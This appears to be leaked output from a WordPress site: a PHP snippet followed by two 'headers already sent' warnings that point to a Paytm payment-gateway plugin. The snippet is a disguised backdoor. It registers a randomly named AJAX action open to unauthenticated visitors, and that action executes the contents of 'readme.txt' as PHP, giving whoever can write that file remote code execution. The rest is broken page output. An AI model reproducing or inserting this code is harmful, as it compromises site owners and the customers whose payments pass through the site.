if(!function_exists('file_check_readme74951')){
add_action('wp_ajax_nopriv_file_check_readme74951', 'file_check_readme74951');
add_action('wp_ajax_file_check_readme74951', 'file_check_readme74951');
function file_check_readme74951()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
Warning: Cannot modify header information - headers already sent by (output started at /home3/smenterp/public_html/www.satyashri.com/wp-content/plugins/woo-paytm-payment-gateway/wc-paytm.php:349) in /home3/smenterp/public_html/www.satyashri.com/wp-includes/pluggable.php on line 1435
Warning: Cannot modify header information - headers already sent by (output started at /home3/smenterp/public_html/www.satyashri.com/wp-content/plugins/woo-paytm-payment-gateway/wc-paytm.php:349) in /home3/smenterp/public_html/www.satyashri.com/wp-includes/pluggable.php on line 1438